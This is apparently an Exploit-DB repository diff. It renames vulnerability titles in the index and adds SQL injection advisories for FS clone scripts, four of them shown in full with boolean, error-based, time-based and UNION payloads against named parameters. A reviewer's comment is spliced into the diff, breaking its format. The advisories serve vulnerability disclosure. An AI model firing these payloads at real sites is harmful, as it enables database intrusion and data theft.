 30170,platforms/php/webapps/30170.txt,"Beehive Forum 0.7.1 - 'links.php' Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",php,webapps,0
 18593,platforms/php/webapps/18593.txt,"ModX 2.2.0 - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0
 18594,platforms/php/webapps/18594.txt,"Simple Posting System - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0
-14247,platforms/php/webapps/14247.txt,"Auction_Software Script - Admin Login Bypass",2010-07-06,ALTBTA,php,webapps,0
+14247,platforms/php/webapps/14247.txt,"Auction_Software Script - Admin Authentication Bypass",2010-07-06,ALTBTA,php,webapps,0
 13736,platforms/php/webapps/13736.txt,"DDLCMS 2.1 - 'skin' Remote File Inclusion",2010-06-06,eidelweiss,php,webapps,0
 13737,platforms/php/webapps/13737.txt,"Joomla! Component DJ-ArtGallery 0.9.1 - Multiple Vulnerabilities",2010-06-06,d0lc3,php,webapps,0
 13738,platforms/php/webapps/13738.txt,"PHP Director 0.2 - SQL Injection",2010-06-06,Mr.Rat,php,webapps,0
@@ -24738,7 +24739,7 @@ id,file,description,date,author,platform,type,port
 15075,platforms/php/webapps/15075.txt,"wpQuiz 2.7 - Authentication Bypass",2010-09-21,KnocKout,php,webapps,0
 15078,platforms/asp/webapps/15078.txt,"gausCMS - Multiple Vulnerabilities",2010-09-22,Abysssec,asp,webapps,0
 15080,platforms/php/webapps/15080.txt,"Skybluecanvas 1.1-r248 - Cross-Site Request Forgery",2010-09-22,Sweet,php,webapps,0
-15082,platforms/php/webapps/15082.txt,"BSI Hotel Booking System Admin 1.4/2.0 - Login Bypass",2010-09-22,K-159,php,webapps,0
+15082,platforms/php/webapps/15082.txt,"BSI Hotel Booking System Admin 1.4/2.0 - Authentication Bypass",2010-09-22,K-159,php,webapps,0
 15084,platforms/php/webapps/15084.txt,"Joomla! Component TimeTrack 1.2.4 - Multiple SQL Injections",2010-09-22,"Salvatore Fresta",php,webapps,0
 15085,platforms/php/webapps/15085.txt,"Joomla! Component Joostina - SQL Injection",2010-09-22,Gamoscu,php,webapps,0
 15090,platforms/php/webapps/15090.txt,"WAnewsletter 2.1.2 - SQL Injection",2010-09-23,BrOx-Dz,php,webapps,0
@@ -24905,7 +24906,7 @@ id,file,description,date,author,platform,type,port
 15441,platforms/php/webapps/15441.txt,"MassMirror Uploader - Remote File Inclusion",2010-11-06,ViciOuS,php,webapps,0
 15447,platforms/php/webapps/15447.txt,"phpCow 2.1 - File Inclusion",2010-11-06,ViRuS_HiMa,php,webapps,0
 15448,platforms/asp/webapps/15448.txt,"ASPilot Pilot Cart 7.3 - Multiple Vulnerabilities",2010-11-07,Ariko-Security,asp,webapps,0
-15451,platforms/php/webapps/15451.pl,"DeluxeBB 1.3 - Private Info Disclosure",2010-11-07,"Vis Intelligendi",php,webapps,0
+15451,platforms/php/webapps/15451.pl,"DeluxeBB 1.3 - Private Information Disclosure",2010-11-07,"Vis Intelligendi",php,webapps,0
 15452,platforms/php/webapps/15452.txt,"Punbb 1.3.4 - Multiple Full Path Disclosures",2010-11-07,SYSTEM_OVERIDE,php,webapps,0
 15453,platforms/php/webapps/15453.txt,"Joomla! Component Cookex Agency CKForms - Local File Inclusion",2010-11-08,ALTBTA,php,webapps,0
 15454,platforms/php/webapps/15454.txt,"Joomla! Component com_clan - SQL Injection",2010-11-08,AtT4CKxT3rR0r1ST,php,webapps,0
@@ -25205,7 +25206,7 @@ id,file,description,date,author,platform,type,port
 16109,platforms/php/webapps/16109.txt,"Podcast Generator 1.3 - Multiple Vulnerabilities",2011-02-04,"High-Tech Bridge SA",php,webapps,0
 16113,platforms/php/webapps/16113.txt,"osCommerce - Authentication Bypass",2011-02-04,"Nicolas Krassas",php,webapps,0
 16114,platforms/php/webapps/16114.txt,"Chamilo 1.8.7 / Dokeos 1.8.6 - Remote File Disclosure",2011-02-05,beford,php,webapps,0
-16116,platforms/php/webapps/16116.txt,"Qcodo Development Framework 0.3.3 - Full Info Disclosure",2011-02-05,"Daniel Godoy",php,webapps,0
+16116,platforms/php/webapps/16116.txt,"Qcodo Development Framework 0.3.3 - Full Information Disclosure",2011-02-05,"Daniel Godoy",php,webapps,0
 16117,platforms/php/webapps/16117.txt,"Escort und Begleitservice Agentur Script - SQL Injection",2011-02-05,NoNameMT,php,webapps,0
 16122,platforms/php/webapps/16122.txt,"Dew-NewPHPLinks 2.1b - 'index.php' SQL Injection",2011-02-06,AtT4CKxT3rR0r1ST,php,webapps,0
 16221,platforms/php/webapps/16221.txt,"WordPress Plugin Comment Rating 2.9.23 - Multiple Vulnerabilities",2011-02-23,"High-Tech Bridge SA",php,webapps,0
@@ -25381,7 +25382,7 @@ id,file,description,date,author,platform,type,port
 17077,platforms/php/webapps/17077.txt,"Pligg CMS 1.1.3 - Multiple Vulnerabilities",2011-03-30,"Jelmer de Hen",php,webapps,0
 17079,platforms/php/webapps/17079.txt,"IrIran Shoping Script - SQL Injection",2011-03-30,Net.Edit0r,php,webapps,0
 17080,platforms/php/webapps/17080.txt,"BigACE 2.7.5 - Arbitrary File Upload",2011-03-30,Net.Edit0r,php,webapps,0
-17081,platforms/asp/webapps/17081.txt,"CosmoQuest - Login Bypass",2011-03-30,Net.Edit0r,asp,webapps,0
+17081,platforms/asp/webapps/17081.txt,"CosmoQuest - Authentication Bypass",2011-03-30,Net.Edit0r,asp,webapps,0
 17084,platforms/php/webapps/17084.txt,"Andy's PHP KnowledgeBase 0.95.2 - 'viewusers.php' SQL Injection",2011-03-30,"Mark Stanislav",php,webapps,0
 17085,platforms/php/webapps/17085.txt,"PHPBoost 3.0 - Remote Download Backup",2011-03-31,KedAns-Dz,php,webapps,0
 17091,platforms/php/webapps/17091.html,"Allomani E-Store 1.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,php,webapps,0
@@ -26561,7 +26562,7 @@ id,file,description,date,author,platform,type,port
 21411,platforms/cgi/webapps/21411.txt,"vqServer 1.9.x - CGI Demo Program Script Injection",2002-04-21,"Matthew Murphy",cgi,webapps,0
 21417,platforms/hardware/webapps/21417.py,"Thomson Wireless VoIP Cable Modem - Authentication Bypass",2012-09-20,"Glafkos Charalambous",hardware,webapps,0
 21418,platforms/php/webapps/21418.txt,"Manhali 1.8 - Local File Inclusion",2012-09-20,L0n3ly-H34rT,php,webapps,0
-21421,platforms/php/webapps/21421.txt,"PHProjekt 2.x/3.x - Login Bypass",2002-04-25,"Ulf Harnhammar",php,webapps,0
+21421,platforms/php/webapps/21421.txt,"PHProjekt 2.x/3.x - Authentication Bypass",2002-04-25,"Ulf Harnhammar",php,webapps,0
 21423,platforms/php/webapps/21423.txt,"Ultimate PHP Board 1.0/1.1 - Image Tag Script Injection",2002-04-25,frog,php,webapps,0
 21424,platforms/php/webapps/21424.txt,"ADManager 1.1 - Content Manipulation",2002-04-17,frog,php,webapps,0
 21425,platforms/php/webapps/21425.txt,"DNSTools 2.0 - Authentication Bypass",2002-04-28,ppp-design,php,webapps,0
@@ -27691,7 +27692,7 @@ id,file,description,date,author,platform,type,port
 24368,platforms/asp/webapps/24368.txt,"MapInfo Discovery 1.0/1.1 - Remote Log File Access Information Disclosure",2004-07-15,anonymous,asp,webapps,0
 24369,platforms/asp/webapps/24369.txt,"MapInfo Discovery 1.0/1.1 - 'MapFrame.asp?mapname' Cross-Site Scripting",2004-07-15,anonymous,asp,webapps,0
 24370,platforms/asp/webapps/24370.txt,"MapInfo Discovery 1.0/1.1 - Cleartext Transmission Credential Disclosure",2004-07-15,anonymous,asp,webapps,0
-24371,platforms/asp/webapps/24371.txt,"MapInfo Discovery 1.0/1.1 - Administrative Login Bypass",2004-07-15,anonymous,asp,webapps,0
+24371,platforms/asp/webapps/24371.txt,"MapInfo Discovery 1.0/1.1 - Administrative Authentication Bypass",2004-07-15,anonymous,asp,webapps,0
 24372,platforms/php/webapps/24372.txt,"CuteNews 1.3.1 - 'show_archives.php' Cross-Site Scripting",2004-07-16,"Debasis Mohanty",php,webapps,0
 24373,platforms/php/webapps/24373.txt,"PScript PForum 1.24/1.25 - User Profile HTML Injection",2004-07-16,"Christoph Jeschke",php,webapps,0
 24375,platforms/php/webapps/24375.txt,"RaXnet Cacti 0.6.x/0.8.x - 'Auth_Login.php' SQL Injection",2004-07-16,"Fernando Quintero",php,webapps,0
@@ -28437,7 +28438,7 @@ id,file,description,date,author,platform,type,port
 25657,platforms/php/webapps/25657.txt,"OpenBB 1.0.8 - 'member.php' Cross-Site Scripting",2005-05-13,Megasky,php,webapps,0
 25659,platforms/php/webapps/25659.txt,"PHPHeaven PHPMyChat 0.14.5 - 'Start-Page.CSS.php3' Cross-Site Scripting",2005-05-13,Megasky,php,webapps,0
 25660,platforms/php/webapps/25660.txt,"PHPHeaven PHPMyChat 0.14.5 - 'Style.CSS.php3' Cross-Site Scripting",2005-05-13,Megasky,php,webapps,0
-25661,platforms/asp/webapps/25661.txt,"Keyvan1 ImageGallery - Database Download",2005-05-01,"g0rellazz G0r",asp,webapps,0
+25661,platforms/asp/webapps/25661.txt,"Keyvan1 ImageGallery - Database Disclosure",2005-05-01,"g0rellazz G0r",asp,webapps,0
 25662,platforms/php/webapps/25662.txt,"Skull-Splitter Guestbook 1.0/2.0/2.2 - Multiple HTML Injection Vulnerabilities",2005-05-14,"Morinex Eneco",php,webapps,0
 25663,platforms/php/webapps/25663.txt,"Shop-Script - categoryId SQL Injection",2005-05-16,"CENSORED Search Vulnerabilities",php,webapps,0
 25664,platforms/php/webapps/25664.txt,"Shop-Script - ProductID SQL Injection",2005-05-16,"CENSORED Search Vulnerabilities",php,webapps,0
@@ -28892,7 +28893,7 @@ id,file,description,date,author,platform,type,port
 26241,platforms/php/webapps/26241.txt,"Fly-High CMS 2012-07-08 - Unrestricted Arbitrary File Upload",2013-06-17,"CWH Underground",php,webapps,0
 26243,platforms/php/webapps/26243.txt,"Havalite CMS 1.1.7 - Unrestricted Arbitrary File Upload",2013-06-17,"CWH Underground",php,webapps,0
 26244,platforms/php/webapps/26244.txt,"SPBAS Business Automation Software 2012 - Multiple Vulnerabilities",2013-06-17,"Christy Philip Mathew",php,webapps,0
-26246,platforms/php/webapps/26246.txt,"Simple File Manager 024 - Login Bypass",2013-06-17,Chako,php,webapps,0
+26246,platforms/php/webapps/26246.txt,"Simple File Manager 024 - Authentication Bypass",2013-06-17,Chako,php,webapps,0
 26247,platforms/php/webapps/26247.txt,"MyBulletinBoard (MyBB) 1.0 - 'RateThread.php' SQL Injection",2005-09-09,stranger-killer,php,webapps,0
 40300,platforms/php/webapps/40300.py,"HelpDeskZ 1.0.2 - Unauthenticated Arbitrary File Upload",2016-08-29,"Lars Morgenroth",php,webapps,80
 26252,platforms/php/webapps/26252.txt,"Subscribe Me Pro 2.44 - S.pl Directory Traversal",2005-09-13,h4cky0u,php,webapps,0
@@ -30057,7 +30058,7 @@ id,file,description,date,author,platform,type,port
 27750,platforms/php/webapps/27750.py,"Bitbot C2 Panel - 'gate2.php' Multiple Vulnerabilities",2013-08-21,bwall,php,webapps,0
 27751,platforms/php/webapps/27751.txt,"WordPress Plugin ThinkIT 0.1 - Multiple Vulnerabilities",2013-08-21,"Yashar shahinzadeh",php,webapps,0
 27753,platforms/hardware/webapps/27753.txt,"Samsung DVR Firmware 1.10 - Authentication Bypass",2013-08-21,"Andrea Fabrizi",hardware,webapps,80
-27755,platforms/windows/webapps/27755.txt,"Adobe ColdFusion 9 - Administrative Login Bypass",2013-08-21,"Scott Buckel",windows,webapps,0
+27755,platforms/windows/webapps/27755.txt,"Adobe ColdFusion 9 - Administrative Authentication Bypass",2013-08-21,"Scott Buckel",windows,webapps,0
 27756,platforms/hardware/webapps/27756.txt,"Sitecom N300/N600 Devices - Multiple Vulnerabilities",2013-08-21,"Roberto Paleari",hardware,webapps,0
 27757,platforms/asp/webapps/27757.txt,"DUclassified - 'detail.asp' SQL Injection",2006-04-28,sadegh.sarshogh,asp,webapps,0
 27761,platforms/cgi/webapps/27761.txt,"NeoMail - 'NeoMail.pl?sessionid' Cross-Site Scripting",2006-04-28,O.U.T.L.A.W,cgi,webapps,0
@@ -31297,7 +31298,7 @@ id,file,description,date,author,platform,type,port
 29497,platforms/php/webapps/29497.txt,"Easebay Resources Paypal Subscription - Manager Multiple Input Validation Vulnerabilities",2007-01-20,Doz,php,webapps,0
 29498,platforms/php/webapps/29498.txt,"Easebay Resources Login Manager - Multiple Input Validation Vulnerabilities",2007-01-20,Doz,php,webapps,0
 29499,platforms/php/webapps/29499.txt,"SMF 1.1 - 'index.php' HTML Injection",2007-01-20,"Aria-Security Team",php,webapps,0
-29500,platforms/asp/webapps/29500.txt,"RASPcalendar 1.01 - [ASP] Admin Login",2013-11-08,"Hackeri-AL UAH-Crew",asp,webapps,0
+29500,platforms/asp/webapps/29500.txt,"RASPcalendar 1.01 (ASP) - Admin Login",2013-11-08,"Hackeri-AL UAH-Crew",asp,webapps,0
 29504,platforms/php/webapps/29504.txt,"Unique Ads - 'Banner.php' SQL Injection",2007-01-22,Linux_Drox,php,webapps,0
 29505,platforms/php/webapps/29505.txt,"212Cafe Board - Multiple Cross-Site Scripting Vulnerabilities",2007-01-22,Linux_Drox,php,webapps,0
 29506,platforms/php/webapps/29506.txt,"Bitweaver 1.3.1 Articles and Blogs - Multiple Cross-Site Scripting Vulnerabilities",2007-01-22,CorryL,php,webapps,0
@@ -31642,7 +31643,7 @@ id,file,description,date,author,platform,type,port
 29915,platforms/php/webapps/29915.txt,"MoinMoin 1.5.x - 'index.php' Cross-Site Scripting",2007-04-26,"En Douli",php,webapps,0
 29917,platforms/php/webapps/29917.php,"FlashComs Chat 6.5 - Arbitrary File Upload",2013-11-30,"Miya Chung",php,webapps,0
 29918,platforms/java/webapps/29918.txt,"Ametys CMS 3.5.2 - 'lang' XPath Injection",2013-11-30,LiquidWorm,java,webapps,0
-29921,platforms/php/webapps/29921.py,"Zend-Framework - Full Info Disclosure",2013-11-30,"Ariel Orellana",php,webapps,0
+29921,platforms/php/webapps/29921.py,"Zend-Framework - Full Information Disclosure",2013-11-30,"Ariel Orellana",php,webapps,0
 29924,platforms/hardware/webapps/29924.txt,"TP-Link TD-8840t - Cross-Site Request Forgery",2013-11-30,"mohammed al-saggaf",hardware,webapps,0
 29927,platforms/hardware/webapps/29927.txt,"Scientific-Atlanta_ Inc. DPR2320R2 - Multiple Cross-Site Request Forgery Vulnerabilities",2013-11-30,sajith,hardware,webapps,0
 29929,platforms/asp/webapps/29929.txt,"Burak Yilmaz Blog 1.0 - 'BRY.asp' SQL Injection",2007-04-26,RMx,asp,webapps,0
@@ -32304,7 +32305,7 @@ id,file,description,date,author,platform,type,port
 31137,platforms/php/webapps/31137.txt,"Joomla! / Mambo Component com_comments 0.5.8.5g - 'id' SQL Injection",2008-02-11,CheebaHawk215,php,webapps,0
 31140,platforms/php/webapps/31140.txt,"iTechClassifieds 3.03.057 - SQL Injection",2014-01-23,vinicius777,php,webapps,0
 31141,platforms/php/webapps/31141.txt,"godontologico 5 - SQL Injection",2014-01-23,vinicius777,php,webapps,0
-31142,platforms/php/webapps/31142.txt,"Simple E-document 1.31 - Login Bypass",2014-01-23,vinicius777,php,webapps,0
+31142,platforms/php/webapps/31142.txt,"Simple E-document 1.31 - Authentication Bypass",2014-01-23,vinicius777,php,webapps,0
 31143,platforms/php/webapps/31143.txt,"PizzaInn_Project - SQL Injection",2014-01-23,vinicius777,php,webapps,0
 31144,platforms/php/webapps/31144.txt,"mySeatXT 0.2134 - SQL Injection",2014-01-23,vinicius777,php,webapps,0
 31145,platforms/php/webapps/31145.txt,"Easy POS System - 'login.php' SQL Injection",2014-01-23,vinicius777,php,webapps,0
@@ -33018,7 +33019,7 @@ id,file,description,date,author,platform,type,port
 32201,platforms/php/webapps/32201.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - 'scrapbook.php?uid' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0
 32202,platforms/php/webapps/32202.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - 'index.php?uid' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0
 32203,platforms/php/webapps/32203.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - 'tribes.php?uid' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0
-32204,platforms/hardware/webapps/32204.txt,"ZYXEL P-660HN-T1A Router - Login Bypass",2014-03-12,"Michael Grifalconi",hardware,webapps,0
+32204,platforms/hardware/webapps/32204.txt,"ZYXEL P-660HN-T1A Router - Authentication Bypass",2014-03-12,"Michael Grifalconi",hardware,webapps,0
 32282,platforms/php/webapps/32282.txt,"Church Edit - Blind SQL Injection",2014-03-15,ThatIcyChill,php,webapps,0
 32207,platforms/php/webapps/32207.txt,"GNUPanel 0.3.5_R4 - Multiple Vulnerabilities",2014-03-12,"Necmettin COSKUN",php,webapps,80
 32211,platforms/php/webapps/32211.txt,"LuxCal 3.2.2 - Cross-Site Request Forgery / Blind SQL Injection",2014-03-12,"TUNISIAN CYBER",php,webapps,80
@@ -33856,7 +33857,7 @@ id,file,description,date,author,platform,type,port
 33773,platforms/php/webapps/33773.txt,"tenfourzero.net Shutter 0.1.4 - 'admin.html' Multiple SQL Injections",2010-03-18,blake,php,webapps,0
 33776,platforms/php/webapps/33776.txt,"Kempt SiteDone 2.0 - '/detail.php' Cross-Site Scripting / SQL Injection",2010-03-18,d3v1l,php,webapps,0
 33777,platforms/php/webapps/33777.txt,"PHPWind 6.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-03-19,Liscker,php,webapps,0
-33779,platforms/jsp/webapps/33779.txt,"agXchange ESM - 'ucschcancelproc.jsp' Open redirection",2010-03-22,Lament,jsp,webapps,0
+33779,platforms/jsp/webapps/33779.txt,"agXchange ESM - 'ucschcancelproc.jsp' Open Redirection",2010-03-22,Lament,jsp,webapps,0
 33781,platforms/php/webapps/33781.txt,"Lussumo Vanilla 1.1.10 - 'definitions.php' Multiple Remote File Inclusions",2010-03-23,eidelweiss,php,webapps,0
 33782,platforms/php/webapps/33782.txt,"PHPKIT 1.6.x - 'b-day.php' Addon SQL Injection",2010-03-22,n3w7u,php,webapps,0
 33784,platforms/php/webapps/33784.txt,"vBulletin 4.0.2 - Search Cross-Site Scripting",2010-03-19,5ubzer0,php,webapps,0
@@ -36491,7 +36492,7 @@ id,file,description,date,author,platform,type,port
 38011,platforms/php/webapps/38011.txt,"OrangeHRM - 'sortField' SQL Injection",2012-11-07,"High-Tech Bridge",php,webapps,0
 38012,platforms/php/webapps/38012.txt,"WordPress Plugin FLV Player - 'id' SQL Injection",2012-11-07,"Ashiyane Digital Security Team",php,webapps,0
 38015,platforms/php/webapps/38015.txt,"AR Web Content Manager (AWCM) - 'cookie_gen.php' Arbitrary Cookie Generation",2012-11-08,"Sooel Son",php,webapps,0
-38016,platforms/multiple/webapps/38016.txt,"ESRI ArcGIS for Server - 'where' Form Field SQL Injection",2012-11-09,anonymous,multiple,webapps,0
+38016,platforms/multiple/webapps/38016.txt,"ESRI ArcGIS for Server - 'where' Form SQL Injection",2012-11-09,anonymous,multiple,webapps,0
 38017,platforms/php/webapps/38017.txt,"WordPress Theme Kakao - 'ID' SQL Injection",2012-11-09,sil3nt,php,webapps,0
 38018,platforms/php/webapps/38018.txt,"WordPress Plugin PHP Event Calendar - 'cid' SQL Injection",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0
 38019,platforms/php/webapps/38019.txt,"WordPress Plugin Eco-annu - 'eid' SQL Injection",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0
@@ -36685,7 +36686,7 @@ id,file,description,date,author,platform,type,port
 38406,platforms/php/webapps/38406.txt,"PHP-Fusion 7.02.07 - Blind SQL Injection",2015-10-06,"Manuel García Cárdenas",php,webapps,0
 38407,platforms/php/webapps/38407.txt,"GLPI 0.85.5 - Arbitrary File Upload / Filter Bypass / Remote Code Execution",2015-10-06,"Raffaele Forte",php,webapps,0
 38408,platforms/php/webapps/38408.txt,"Jaow CMS - 'add_ons' Cross-Site Scripting",2013-03-23,Metropolis,php,webapps,0
-38409,platforms/hardware/webapps/38409.html,"ZTE ZXHN H108N Router - Unauthenticated Config Download",2015-10-06,"Todor Donev",hardware,webapps,0
+38409,platforms/hardware/webapps/38409.html,"ZTE ZXHN H108N Router - Unauthenticated Config Disclosure",2015-10-06,"Todor Donev",hardware,webapps,0
 38410,platforms/php/webapps/38410.txt,"WordPress Plugin Banners Lite - 'wpbanners_show.php' HTML Injection",2013-03-25,"Fernando A. Lagos B",php,webapps,0
 38411,platforms/python/webapps/38411.txt,"Zope Management Interface 4.3.7 - Cross-Site Request Forgery",2015-10-07,hyp3rlinx,python,webapps,0
 38413,platforms/php/webapps/38413.txt,"OrionDB Web Directory - Multiple Cross-Site Scripting Vulnerabilities",2013-03-27,3spi0n,php,webapps,0
@@ -38726,3 +38727,14 @@ id,file,description,date,author,platform,type,port
 43024,platforms/multiple/webapps/43024.txt,"Logitech Media Server - Cross-Site Scripting",2017-10-14,"Thiago Sena",multiple,webapps,0
 43027,platforms/php/webapps/43027.txt,"CometChat < 6.2.0 BETA 1 - Local File Inclusion",2017-10-22,Paradoxis,php,webapps,0
 43028,platforms/php/webapps/43028.py,"Kaltura < 13.1.0 - Remote Code Execution",2017-10-23,"Robin Verton",php,webapps,0
+43034,platforms/php/webapps/43034.txt,"FS Car Rental Script - 'pickup_location' SQL Injection",2017-10-23,8bitsec,php,webapps,0
+43035,platforms/php/webapps/43035.txt,"FS Amazon Clone - 'category_id' SQL Injection",2017-10-23,8bitsec,php,webapps,0
+43036,platforms/php/webapps/43036.txt,"FS Book Store Script - 'category' SQL Injection",2017-10-23,8bitsec,php,webapps,0
+43037,platforms/php/webapps/43037.txt,"FS Ebay Clone - 'pd_maincat_id' SQL Injection",2017-10-23,8bitsec,php,webapps,0
+43038,platforms/php/webapps/43038.txt,"FS Food Delivery Script - 'keywords' SQL Injection",2017-10-23,8bitsec,php,webapps,0
+43039,platforms/php/webapps/43039.txt,"FS Expedia Clone - 'hid' SQL Injection",2017-10-23,8bitsec,php,webapps,0
+43040,platforms/php/webapps/43040.txt,"FS Freelancer Clone - 'sk' SQL Injection",2017-10-23,8bitsec,php,webapps,0
+43041,platforms/php/webapps/43041.txt,"FS Groupon Clone - 'category' SQL Injection",2017-10-23,8bitsec,php,webapps,0
+43042,platforms/php/webapps/43042.txt,"FS Indiamart Clone - 'keywords' SQL Injection",2017-10-23,8bitsec,php,webapps,0
+43043,platforms/php/webapps/43043.txt,"FS Lynda Clone - 'category' SQL Injection",2017-10-23,8bitsec,php,webapps,0
+43044,platforms/php/webapps/43044.txt,"FS OLX Clone - 'catg_id' SQL Injection",2017-10-23,8bitsec,php,webapps,0
diff --git a/platforms/php/webapps/43034.txt b/platforms/php/webapps/43034.txt
new file mode 100755
index 000000000..063f5e479
--- /dev/null
+++ b/platforms/php/webapps/43034.txt
@@ -0,0 +1,45 @@
+# Exploit Title: FS Car Rental Script - SQL Injection
+# Date: 2017-10-23
+# Exploit Author: 8bitsec
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/car-rental-script/
+# Version: 23 October 17
+# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2017-10-23
+
+Product & Service Introduction:
+===============================
+This is a versatile script to help you to launch a car rental website.
+
+Technical Details & Description:
+================================
+
+SQL injection on [pickup_location] post parameter.
+
+Proof of Concept (PoC):
+=======================
+
+SQLi:
+
+https://localhost/[path]/vehicle/
+
+Parameter: pickup_location (POST)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: pickup_location=7 AND 8531=8531&pickup_date=2017-10-24 12:19:35&dropoff_date=2017-10-24 12:19:36
+
+ Type: error-based
+ Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+ Payload: pickup_location=7 AND (SELECT 7390 FROM(SELECT COUNT(*),CONCAT(0x7178787671,(SELECT (ELT(7390=7390,1))),0x71766a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&pickup_date=2017-10-24 12:19:35&dropoff_date=2017-10-24 12:19:36
+
+ Type: AND/OR time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind
+ Payload: pickup_location=7 AND SLEEP(5)&pickup_date=2017-10-24 12:19:35&dropoff_date=2017-10-24 12:19:36
+
+==================
+8bitsec - [https://twitter.com/_8bitsec]
\ No newline at end of file
diff --git a/platforms/php/webapps/43035.txt b/platforms/php/webapps/43035.txt
new file mode 100755
index 000000000..df5ff5794
--- /dev/null
+++ b/platforms/php/webapps/43035.txt
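Review bot: In 43034.txt the `# Version:` field holds a date (`23 October 17`) rather than a release number, so the entry does not say which builds are affected; the ten sibling advisories added in this commit (43035.txt to 43044.txt) carry the same value. None of the eleven write-ups names a fix or a vendor response, and each stops at the payload listing. A closing line such as `Mitigation: bind the reported parameter through a prepared statement; no vendor patch known at publication` (if that is accurate) would let a reader triage the entry without re-testing it.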
@@ -0,0 +1,45 @@
+# Exploit Title: FS Amazon Clone - SQL Injection
+# Date: 2017-10-23
+# Exploit Author: 8bitsec
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/amazon-clone/
+# Version: 23 October 17
+# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2017-10-23
+
+Product & Service Introduction:
+===============================
+Frontrunner in the field of all the multi-vendor scripts.
+
+Technical Details & Description:
+================================
+
+SQL injection on [category_id] parameter.
+
+Proof of Concept (PoC):
+=======================
+
+SQLi:
+
+https://localhost/[path]/search.php?category_id=1 AND 2635=2635&sub_category_id=1&search=xxxxx
+
+Parameter: category_id (GET)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: category_id=1 AND 2635=2635&sub_category_id=1&search=xxxxx
+
+ Type: AND/OR time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind
+ Payload: category_id=1 AND SLEEP(5)&sub_category_id=1&search=xxxxx
+
+ Type: UNION query
+ Title: Generic UNION query (NULL) - 15 columns
+ Payload: category_id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71786a7071,0x714e746578554b6b4b4274697974755366576555457a6c6c576269474c7877744347466d6647695a,0x7176767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- JpGm&sub_category_id=1&search=xxxxx
+
+==================
+8bitsec - [https://twitter.com/_8bitsec]
\ No newline at end of file
diff --git a/platforms/php/webapps/43036.txt b/platforms/php/webapps/43036.txt
new file mode 100755
index 000000000..f4368f9e4
--- /dev/null
+++ b/platforms/php/webapps/43036.txt
@@ -0,0 +1,37 @@
+# Exploit Title: FS Book Store Script - SQL Injection
+# Date: 2017-10-23
+# Exploit Author: 8bitsec
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/book-store-script/
+# Version: 23 October 17
+# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2017-10-23
+
+Product & Service Introduction:
+===============================
+This is a robust platform for the booksellers and bookshop owners.
+
+Technical Details & Description:
+================================
+
+SQL injection on [category] parameter.
+
+Proof of Concept (PoC):
+=======================
+
+SQLi:
+
+https://localhost/[path]/book_search.php?book_name=xxxxx&category=4 AND SLEEP(5)
+
+Parameter: category (GET)
+ Type: AND/OR time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind
+ Payload: book_name=xxxxx&category=4 AND SLEEP(5)
+
+==================
+8bitsec - [https://twitter.com/_8bitsec]
\ No newline at end of file
diff --git a/platforms/php/webapps/43037.txt b/platforms/php/webapps/43037.txt
new file mode 100755
index 000000000..b314e8dea
--- /dev/null
+++ b/platforms/php/webapps/43037.txt
@@ -0,0 +1,41 @@
+# Exploit Title: FS Ebay Clone - SQL Injection
+# Date: 2017-10-23
+# Exploit Author: 8bitsec
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/ebay-clone/
+# Version: 23 October 17
+# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2017-10-23
+
+Product & Service Introduction:
+===============================
+This is indeed the best standard auction product pre-integrated with a robust multi-vendor interface and a powerful CMS panel.
+
+Technical Details & Description:
+================================
+
+SQL injection on [pd_maincat_id] parameter.
+
+Proof of Concept (PoC):
+=======================
+
+SQLi:
+
+https://localhost/[path]/advance-search-result.php?keywords=any&pd_maincat_id=1' AND 7301=7301 AND 'iXUk'='iXUk&submit=Search
+
+Parameter: pd_maincat_id (GET)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: keywords=any&pd_maincat_id=1' AND 7301=7301 AND 'iXUk'='iXUk&submit=Search
+
+ Type: AND/OR time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind
+ Payload: keywords=any&pd_maincat_id=1' AND SLEEP(5) AND 'aHHy'='aHHy&submit=Search
+
+==================
+8bitsec - [https://twitter.com/_8bitsec]
\ No newline at end of file
diff --git a/platforms/php/webapps/43038.txt b/platforms/php/webapps/43038.txt
new file mode 100755
index 000000000..2ec505bf1
--- /dev/null
+++ b/platforms/php/webapps/43038.txt
@@ -0,0 +1,41 @@
